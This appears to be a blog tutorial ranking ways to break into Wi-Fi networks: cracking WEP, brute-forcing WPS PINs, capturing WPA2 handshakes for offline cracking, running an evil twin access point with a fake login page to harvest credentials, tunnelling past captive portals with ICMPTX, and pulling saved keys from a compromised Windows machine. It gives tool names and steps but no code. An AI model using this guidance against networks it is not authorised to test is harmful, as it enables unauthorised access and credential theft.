Hacking WiFi – Selecting the best strategy

Not every hack will work under every circumstance, so choosing the right strategy is more likely to lead to success and less wasted hours and frustration.

Here, I will lay out the strategies based upon the simplest and most effective first, through the most complex and difficult last. In general, this same continuum will apply to the probability of success.

Before You Begin Wi-Fi Password Cracking

I strongly suggest that you read this article to become familiar with the terminology and basic technology of wireless hacking. In addition, to really be effective at Wi-Fi password cracking while using Aircrack-ng, the premier Wi-Fi cracking tool, you will need to have an Aircrack-ng compatible wireless adapter. Although it is not the perfect wireless cracking adapter, the Alfa AWUS036H is inexpensive, effective, and plug and play on Kali Linux.

1. Crack WEP

WEP, or the Wireless Equivalent Privacy, was the first wireless encryption technology developed. It was quickly found to be flawed and easily cracked. Although you will not find any new WEP-encrypted wireless access points being sold, there are still many legacy WEP APs still around. (On a recent consulting gig with a major U.S. Department of Defense contractor, I found nearly 25% of their APs were using WEP, so it’s still out there.)

WEP can easily be cracked with Aircrack-ng using a statistical cracking method. It is nearly foolproof (don’t prove me wrong on this). If you can collect enough packets (this is key), it’s a simple process. This is one of the reasons you need an Aircrack-ng compatible wireless adapter. You must be able to inject packets simultaneously to capturing packets. Most off-the-shelf wireless cards are incapable of this.

To know whether an AP is using WEP, you can simply hover your mouse over the AP and it will display its encryption algorithm. Note that this approach only works if the AP is using WEP. It does not work on any of the other encryption schemes on wireless. If you are lucky enough to find a wireless AP with WEP, you can expect to crack its password within 10 minutes, although some claim to have done this task in less than 3 minutes.

2. Crack WPS

Many Wi-Fi APs were equipped with Wi-Fi Protected Setup, or WPS, to make it simpler for the average home user without knowledge of Wi-Fi security measures to set up their wireless AP. Fortunately for us, if we can crack that WPS PIN, we can then access the control panel of the AP.

This PIN is relatively simple; just eight digits with one being a checksum, leaving just seven (7) digits, or 10,000,000 possibilities. A single CPU can usually exhaust those possibilities in a few days. Although this might seem slow, brute-forcing the PSK with many times the possibilities can take much longer.

If the wireless AP has WPS enabled, this is the preferred method of cracking modern wireless APs with WPA2. You can use either the Reaver or Bully in conjunction with Aircrack-ng to break these WPS PINs.

3. Crack WPA2

After the disaster that was WEP, the wireless industry developed a new wireless security standard known as WPA2, or Wi-Fi Protected Access II. This standard is now built into nearly every new wireless AP. Although more difficult to hack, it is not impossible.

When a client connects to the AP, there is a 4-way handshake where the pre-shared key (PSK) is transferred from the client machine to the AP. We can capture that PSK hash and then use a dictionary or brute-force attack against it. This can be time-consuming and is not always successful. Success is dependent upon the wordlist you use and the time you have to crack it.

Once you have the hash of the PSK captured, you don’t need to be connected to the AP. With enough resources, you can brute-force any PSK.

4. Evil Twin

If we can’t crack the password on the AP, another strategy that can be successful is creating an Evil Twin—an AP with exactly the same SSID as the known AP, but controlled by us. The key is for the target to connect to our AP, rather than the authentic AP.

Generally, computers will automatically connect to the AP with the strongest signal, so turning up the power on your AP can be a critical element of this hack. When the user connects to our AP, we can then capture all their traffic and view it, as well as capture any other credentials they present to other systems.

An effective variation on the Evil Twin is to set up a system with the same SSID and then present the user with a logon screen. Many corporate offices, hotels, coffee shops, etc. employ this type of security. When the user presents their credentials in our fake logon screen, we capture the credentials and store them. We can then use those credentials on their authentic AP to gain their access.

This process has been automated by a script called Airsnarf. Unfortunately, Airsnarf is out of date, but I have been working on updating it and will present the script and tutorial soon.


If all else fails and you absolutely MUST have Internet access, ICMPTX often works on wireless networks that require authentication via proxy. These include some schools and universities, hotels, coffee shops, libraries, restaurants, and other public Wi-Fi spots. It relies upon the fact that ICMP (the ping protocol) is usually enabled on the AP and passes through to the intended IP address or domain. Since it is not TCP, it does not engage the proxy, it simply passes through.

This hack is complex and time consuming and is not for the beginner to hacking. It is slow, as ICMP can only carry a small amount of data in each packet, but in the circumstance where you actually MUST have Internet access and the amount of data is small, such as email, it works great.

Other Strategies

There are numerous strategies to owning a target system including social engineering and the many Metasploit exploits. When you gain access to the target system, you can simply extract the wireless password from the target system by going to:

C::ProgramDataMicrosoftWlansvcProfilesInterface{Interface GUID}

There, you will find a hex-encoded XML document with the wireless password.

Gaining access to the wireless AP can be as simple as cracking the WEP key or as complex as using ICMPTX, but wireless access can be broken. If all else fails, target one machine on the network, own it, and then recover the password as described above.

About these ads

Leave a Reply

Your email address will not be published. Required fields are marked *

%d bloggers like this: